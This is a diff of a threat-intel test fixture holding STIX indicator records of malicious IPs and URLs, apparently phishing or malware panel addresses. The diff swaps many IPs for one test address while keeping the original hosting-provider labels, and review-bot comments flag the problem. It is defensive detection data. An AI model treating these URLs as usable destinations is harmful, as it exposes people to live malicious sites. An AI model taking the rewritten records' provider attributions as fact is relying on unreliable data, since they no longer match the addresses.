-{"created":"2020-02-23T02:54:48.232Z","description":"TS ID: 55342497251; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--3e220a1d-3d12-4baf-984e-90a3b7431aff","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-59"],"modified":"2020-02-23T02:54:48.232Z","name":"mal_ip: 50.116.87.108","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '50.116.87.108']","type":"indicator","valid_from":"2020-02-23T02:54:48.232Z"}
-{"created":"2020-02-23T02:54:53.263Z","description":"TS ID: 55342497316; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--6bc71acc-f3da-4b79-bcc0-7ce4a4a4d4ce","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-23T02:54:53.263Z","name":"mal_url: http://193.142.59.96/africa/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://193.142.59.96/africa/logs/omc.php']","type":"indicator","valid_from":"2020-02-23T02:54:53.263Z"}
+{"created":"2020-02-23T02:54:48.232Z","description":"TS ID: 55342497251; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--3e220a1d-3d12-4baf-984e-90a3b7431aff","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-59"],"modified":"2020-02-23T02:54:48.232Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-23T02:54:48.232Z"}
+{"created":"2020-02-23T02:54:53.263Z","description":"TS ID: 55342497316; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--6bc71acc-f3da-4b79-bcc0-7ce4a4a4d4ce","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-23T02:54:53.263Z","name":"mal_url: http://89.160.20.156/africa/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/africa/logs/omc.php']","type":"indicator","valid_from":"2020-02-23T02:54:53.263Z"}
 {"created":"2020-02-23T02:54:54.071Z","description":"TS ID: 55342497266; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--1fcdf65f-a35b-4556-a7cc-6c61084af334","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:54:54.071Z","name":"mal_url: http://fvrlink.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://fvrlink.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:54:54.071Z"}
 {"created":"2020-02-23T02:55:00.871Z","description":"TS ID: 55342497310; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--b1974beb-95fb-42b7-b2c0-81f71643da88","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-23T02:55:00.871Z","name":"mal_url: http://euromopy.tech/rosemond/backup/dataz/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://euromopy.tech/rosemond/backup/dataz/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:55:00.871Z"}
 {"created":"2020-02-23T02:55:00.907Z","description":"TS ID: 55342497300; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--48501c24-3a05-4f0c-88f1-2a50eaa227ea","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:55:00.907Z","name":"mal_url: http://febspxi.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://febspxi.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:55:00.907Z"}
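Review bot: The three `mal_ip` indicators rewritten in this hunk (TS IDs 55342497313, 55342497254 and 55342497251) plus the `mal_url` for `/africa/logs/omc.php` now all carry the single value `89.160.20.156`, while keeping distinct STIX ids and their original `Org:` attributions (Unified Layer, PT. Dhecyber Flow Indonesia, CyrusOne LLC) that no longer describe that address. If the ingest pipeline or the expected-results comparison distinguishes indicators by value — deduplication, `threat.indicator.ip` matching, or GeoIP/AS enrichment that will now contradict the description text — these four records collapse into one case and the fixture loses coverage it had before; I cannot see the pipeline from here, so treat that as something to confirm. If the sanctioned test range offers more than one address, spreading the replacements across distinct addresses keeps the records distinguishable; otherwise drop the stale attribution when swapping the IP, e.g. `"description":"TS ID: 55342497313; iType: mal_ip; State: active; Source: CyberCrime"`, so the fixture does not label a test address as belonging to a real hosting provider. Elsewhere in this file the replacement `192.168.118.182` is an RFC 1918 address; if GeoIP enrichment runs on `mal_ip` values it will yield no geo fields for that record, which the regenerated expected output must reflect.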
@@ -595,26 +595,26 @@ {"created":"2020-02-25T02:52:18.371Z","description":"TS ID: 55347597591; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--c19c0ccc-9df8-4804-83da-1c469d220574","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:52:18.371Z","name":"mal_url: http://farsson.com/~zadmin/7/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/7/login.php']","type":"indicator","valid_from":"2020-02-25T02:52:18.371Z"} {"created":"2020-02-25T02:52:27.703Z","description":"TS ID: 55347597548; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--00bee6fc-4a90-4160-8493-8176f8cf73ff","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:52:27.703Z","name":"mal_url: http://farsson.com/~zadmin/14/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/14/login.php']","type":"indicator","valid_from":"2020-02-25T02:52:27.703Z"} {"created":"2020-02-25T02:52:27.729Z","description":"TS ID: 55347597515; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--952cf095-32f4-4b10-8680-499ccd9f784f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-25T02:52:27.729Z","name":"mal_url: http://pabloemino.pw/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://pabloemino.pw/login.php']","type":"indicator","valid_from":"2020-02-25T02:52:27.729Z"} -{"created":"2020-02-25T02:52:27.765Z","description":"TS ID: 55347597501; iType: mal_url; State: active; Org: Swiftway Sp. 
z o.o.; Source: CyberCrime","id":"indicator--7f18dccc-1649-44ea-b9c7-e445487506a2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-43"],"modified":"2020-02-25T02:52:27.765Z","name":"mal_url: http://37.72.168.165/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://37.72.168.165/login']","type":"indicator","valid_from":"2020-02-25T02:52:27.765Z"} -{"created":"2020-02-25T02:52:27.808Z","description":"TS ID: 55347597469; iType: mal_ip; State: active; Org: EuroByte LLC; Source: CyberCrime","id":"indicator--4759e40a-5abd-49dc-90fd-2ba8bac1a613","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-25T02:52:27.808Z","name":"mal_ip: 185.154.52.251","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '185.154.52.251']","type":"indicator","valid_from":"2020-02-25T02:52:27.808Z"} -{"created":"2020-02-25T02:52:37.329Z","description":"TS ID: 55347597509; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime","id":"indicator--ae58138e-b594-4519-adb0-6dbbd8377b75","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-47"],"modified":"2020-02-25T02:52:37.329Z","name":"mal_ip: 194.87.146.180","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '194.87.146.180']","type":"indicator","valid_from":"2020-02-25T02:52:37.329Z"} -{"created":"2020-02-25T02:52:38.025Z","description":"TS ID: 55347597663; iType: mal_ip; State: active; Org: Avguro Technologies Ltd. 
Hosting service provider; Source: CyberCrime","id":"indicator--4c51e9ac-be12-496c-a2d0-7e3536243aef","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-39"],"modified":"2020-02-25T02:52:38.025Z","name":"mal_ip: 81.177.135.161","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '81.177.135.161']","type":"indicator","valid_from":"2020-02-25T02:52:38.025Z"} +{"created":"2020-02-25T02:52:27.765Z","description":"TS ID: 55347597501; iType: mal_url; State: active; Org: Swiftway Sp. z o.o.; Source: CyberCrime","id":"indicator--7f18dccc-1649-44ea-b9c7-e445487506a2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-43"],"modified":"2020-02-25T02:52:27.765Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-02-25T02:52:27.765Z"} +{"created":"2020-02-25T02:52:27.808Z","description":"TS ID: 55347597469; iType: mal_ip; State: active; Org: EuroByte LLC; Source: CyberCrime","id":"indicator--4759e40a-5abd-49dc-90fd-2ba8bac1a613","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-25T02:52:27.808Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-25T02:52:27.808Z"} +{"created":"2020-02-25T02:52:37.329Z","description":"TS ID: 55347597509; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime","id":"indicator--ae58138e-b594-4519-adb0-6dbbd8377b75","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-47"],"modified":"2020-02-25T02:52:37.329Z","name":"mal_ip: 
89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-25T02:52:37.329Z"} +{"created":"2020-02-25T02:52:38.025Z","description":"TS ID: 55347597663; iType: mal_ip; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--4c51e9ac-be12-496c-a2d0-7e3536243aef","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-39"],"modified":"2020-02-25T02:52:38.025Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-25T02:52:38.025Z"} {"created":"2020-02-25T02:52:38.053Z","description":"TS ID: 55347597470; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime","id":"indicator--c36b85d9-df19-439b-8605-d7c4b0653977","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-25T02:52:38.053Z","name":"mal_url: http://ayoobtextlie.com/clap/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ayoobtextlie.com/clap/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:52:38.053Z"} {"created":"2020-02-25T02:52:38.531Z","description":"TS ID: 55347597659; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime","id":"indicator--862bddc3-1b58-45b2-a40d-502d50369e0e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-96"],"modified":"2020-02-25T02:52:38.531Z","name":"mal_url: http://jusqit.com/2/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 
'http://jusqit.com/2/panel/admin.php']","type":"indicator","valid_from":"2020-02-25T02:52:38.531Z"} {"created":"2020-02-25T02:52:38.564Z","description":"TS ID: 55347597488; iType: mal_url; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime","id":"indicator--d16f564b-6c1f-4515-97e7-d9a19515dd78","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-25T02:52:38.564Z","name":"mal_url: http://webupdateadobe.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://webupdateadobe.com/login']","type":"indicator","valid_from":"2020-02-25T02:52:38.564Z"} {"created":"2020-02-25T02:52:40.276Z","description":"TS ID: 55347597520; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--2c31e18b-164e-42bc-afd8-04815a33e043","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-25T02:52:40.276Z","name":"mal_url: http://gsddfsfasa.pw/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://gsddfsfasa.pw/login.php']","type":"indicator","valid_from":"2020-02-25T02:52:40.276Z"} -{"created":"2020-02-25T02:52:40.317Z","description":"TS ID: 55347597516; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--8b22f126-3c79-4d20-8e8c-96e50c384ddf","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-25T02:52:40.317Z","name":"mal_ip: 45.143.92.129","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '45.143.92.129']","type":"indicator","valid_from":"2020-02-25T02:52:40.317Z"} +{"created":"2020-02-25T02:52:40.317Z","description":"TS ID: 55347597516; iType: mal_ip; State: active; Source: 
CyberCrime","id":"indicator--8b22f126-3c79-4d20-8e8c-96e50c384ddf","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-25T02:52:40.317Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-25T02:52:40.317Z"} {"created":"2020-02-25T02:52:40.344Z","description":"TS ID: 55347597474; iType: mal_url; State: active; Org: Confluence Networks; Source: CyberCrime","id":"indicator--387937df-4030-4cfe-91b7-bd9795985adc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-25T02:52:40.344Z","name":"mal_url: http://atlasdecarqo.com/chief5/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://atlasdecarqo.com/chief5/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:52:40.344Z"} -{"created":"2020-02-25T02:52:41.781Z","description":"TS ID: 55347597465; iType: mal_ip; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--fca5d6b6-f486-4a46-a8a6-a1a6cb078a08","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-25T02:52:41.781Z","name":"mal_ip: 185.98.87.192","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '185.98.87.192']","type":"indicator","valid_from":"2020-02-25T02:52:41.781Z"} +{"created":"2020-02-25T02:52:41.781Z","description":"TS ID: 55347597465; iType: mal_ip; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--fca5d6b6-f486-4a46-a8a6-a1a6cb078a08","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-25T02:52:41.781Z","name":"mal_ip: 
89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-25T02:52:41.781Z"} {"created":"2020-02-25T02:52:52.59Z","description":"TS ID: 55347597566; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--4f92667a-5e1b-4111-88d4-e3e04405e97a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:52:52.59Z","name":"mal_url: http://farsson.com/~zadmin/10/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/10/login.php']","type":"indicator","valid_from":"2020-02-25T02:52:52.59Z"} {"created":"2020-02-25T02:52:52.623Z","description":"TS ID: 55347597530; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--04bc5b54-46ae-44d7-96a6-863481383436","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-25T02:52:52.623Z","name":"mal_url: http://anypontop.com/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://anypontop.com/login.php']","type":"indicator","valid_from":"2020-02-25T02:52:52.623Z"} -{"created":"2020-02-25T02:52:52.674Z","description":"TS ID: 55347597522; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--65a5607b-388a-4789-98d0-84d77ee94047","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-25T02:52:52.674Z","name":"mal_ip: 176.119.158.219","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '176.119.158.219']","type":"indicator","valid_from":"2020-02-25T02:52:52.674Z"} +{"created":"2020-02-25T02:52:52.674Z","description":"TS ID: 55347597522; iType: 
mal_ip; State: active; Source: CyberCrime","id":"indicator--65a5607b-388a-4789-98d0-84d77ee94047","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-25T02:52:52.674Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-25T02:52:52.674Z"} {"created":"2020-02-25T02:52:52.712Z","description":"TS ID: 55347597467; iType: mal_url; State: active; Org: Uaservers Network; Source: CyberCrime","id":"indicator--b70344da-8137-4550-b569-97f0e3020ab1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-25T02:52:52.712Z","name":"mal_url: http://epperfums.com/deal/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://epperfums.com/deal/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:52:52.712Z"} -{"created":"2020-02-25T02:52:55.912Z","description":"TS ID: 55347597506; iType: mal_ip; State: active; Org: Leaseweb Deutschland GmbH; Source: CyberCrime","id":"indicator--3ff92876-fac4-49a6-ae80-d123206dc224","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-25T02:52:55.912Z","name":"mal_ip: 195.54.33.150","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '195.54.33.150']","type":"indicator","valid_from":"2020-02-25T02:52:55.912Z"} +{"created":"2020-02-25T02:52:55.912Z","description":"TS ID: 55347597506; iType: mal_ip; State: active; Org: Leaseweb Deutschland GmbH; Source: 
CyberCrime","id":"indicator--3ff92876-fac4-49a6-ae80-d123206dc224","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-25T02:52:55.912Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-25T02:52:55.912Z"} {"created":"2020-02-25T02:53:04.191Z","description":"TS ID: 55347597485; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--cb9b2721-6623-44c2-b1e5-143f2291738b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-63"],"modified":"2020-02-25T02:53:04.191Z","name":"mal_url: http://belt-yard-74.myjino.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://belt-yard-74.myjino.ru/login']","type":"indicator","valid_from":"2020-02-25T02:53:04.191Z"} {"created":"2020-02-25T02:53:12.657Z","description":"TS ID: 55347597478; iType: mal_url; State: active; Org: Confluence Networks; Source: CyberCrime","id":"indicator--04c56a59-3a16-4284-9edc-5445bb539ce5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-25T02:53:12.657Z","name":"mal_url: http://atlasdecarqo.com/chief1/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://atlasdecarqo.com/chief1/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:53:12.657Z"} {"created":"2020-02-25T02:53:15.804Z","description":"TS ID: 55347597559; iType: mal_url; State: active; Org: Dataline Ltd; Source: 
CyberCrime","id":"indicator--1989ffaf-19a7-4850-b142-d31758a3751f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:53:15.804Z","name":"mal_url: http://farsson.com/~zadmin/11/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/11/login.php']","type":"indicator","valid_from":"2020-02-25T02:53:15.804Z"} -{"created":"2020-02-25T02:53:15.88Z","description":"TS ID: 55347597483; iType: mal_ip; State: active; Org: Datalot; Source: CyberCrime","id":"indicator--66939f56-1a6f-43d1-b7a4-277e3ac55584","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-77"],"modified":"2020-02-25T02:53:15.88Z","name":"mal_ip: 104.227.250.186","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '104.227.250.186']","type":"indicator","valid_from":"2020-02-25T02:53:15.88Z"} +{"created":"2020-02-25T02:53:15.88Z","description":"TS ID: 55347597483; iType: mal_ip; State: active; Org: Datalot; Source: CyberCrime","id":"indicator--66939f56-1a6f-43d1-b7a4-277e3ac55584","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-77"],"modified":"2020-02-25T02:53:15.88Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-25T02:53:15.88Z"} {"created":"2020-02-25T02:53:17.191Z","description":"TS ID: 55347597555; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--fe0a731e-e2ff-49ac-a597-150ce46a31fc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:53:17.191Z","name":"mal_url: 
http://farsson.com/~zadmin/12/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/12/login.php']","type":"indicator","valid_from":"2020-02-25T02:53:17.191Z"} {"created":"2020-02-25T02:53:17.224Z","description":"TS ID: 55347597468; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime","id":"indicator--53d00201-4c9a-4275-9091-4cf08fda4676","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-25T02:53:17.224Z","name":"mal_url: http://ayoobtextlie.com/clean/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ayoobtextlie.com/clean/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:53:17.224Z"} {"created":"2020-02-25T02:53:17.256Z","description":"TS ID: 55347597466; iType: mal_url; State: active; Org: Uaservers Network; Source: CyberCrime","id":"indicator--4e154929-35ec-4f71-8793-6b861a9a98f1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-25T02:53:17.256Z","name":"mal_url: http://epperfums.com/divide/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://epperfums.com/divide/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:53:17.256Z"} 
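Review bot: Every rewritten record in this hunk and in the `@@ -624` hunk below now carries the identical address 89.160.20.156 in both `name` and `pattern`, so the fixture no longer distinguishes indicators by their value: a pipeline regression that copied the previous event's indicator address across records would still match the expected output. If the supported test subset offers more than one address, spreading two or three of them across these records would keep the sanitisation while preserving that coverage. The `description` strings still name the original organisations (e.g. `Org: EuroByte LLC` next to the substituted address), which only matters if the pipeline derives fields from the description — not visible in this hunk — but it is worth confirming against the expected file.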
@@ -624,19 +624,19 @@ {"created":"2020-02-25T02:53:36.323Z","description":"TS ID: 55347597534; iType: mal_url; State: active; Org: RUCloud; Source: CyberCrime","id":"indicator--751b74f4-ded7-426d-b425-cb9c2b3113a8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-25T02:53:36.323Z","name":"mal_url: http://agmardorecha.pw/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://agmardorecha.pw/login.php']","type":"indicator","valid_from":"2020-02-25T02:53:36.323Z"} {"created":"2020-02-25T02:53:36.382Z","description":"TS ID: 55347597492; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime","id":"indicator--4fcbf6f5-5acc-42da-acb0-497583b3388d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-53"],"modified":"2020-02-25T02:53:36.382Z","name":"mal_url: http://149.28.186.68/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://149.28.186.68/login']","type":"indicator","valid_from":"2020-02-25T02:53:36.382Z"} {"created":"2020-02-25T02:53:36.421Z","description":"TS ID: 55347597464; iType: mal_url; State: active; Org: Uaservers Network; Source: CyberCrime","id":"indicator--713e0d5f-3842-410f-98d8-25fe0f5b15db","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-25T02:53:36.421Z","name":"mal_url: http://epperfums.com/dope/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://epperfums.com/dope/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:53:36.421Z"} -{"created":"2020-02-25T02:53:42.111Z","description":"TS ID: 55347597500; iType: mal_url; State: active; Source: 
CyberCrime","id":"indicator--895a994a-7833-47fe-a832-fc3ce5f070a5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-71"],"modified":"2020-02-25T02:53:42.111Z","name":"mal_url: http://45.14.14.191/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://45.14.14.191/login']","type":"indicator","valid_from":"2020-02-25T02:53:42.111Z"} +{"created":"2020-02-25T02:53:42.111Z","description":"TS ID: 55347597500; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--895a994a-7833-47fe-a832-fc3ce5f070a5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-71"],"modified":"2020-02-25T02:53:42.111Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-02-25T02:53:42.111Z"} {"created":"2020-02-25T02:54:16.295Z","description":"TS ID: 55347597622; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--86fd616d-f6a3-45ff-a3a8-db1aa59defd9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:54:16.295Z","name":"mal_url: http://farsson.com/~zadmin/4/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/4/login.php']","type":"indicator","valid_from":"2020-02-25T02:54:16.295Z"} {"created":"2020-02-25T02:54:21.544Z","description":"TS ID: 55347597482; iType: mal_url; State: active; Org: ServerMania; Source: 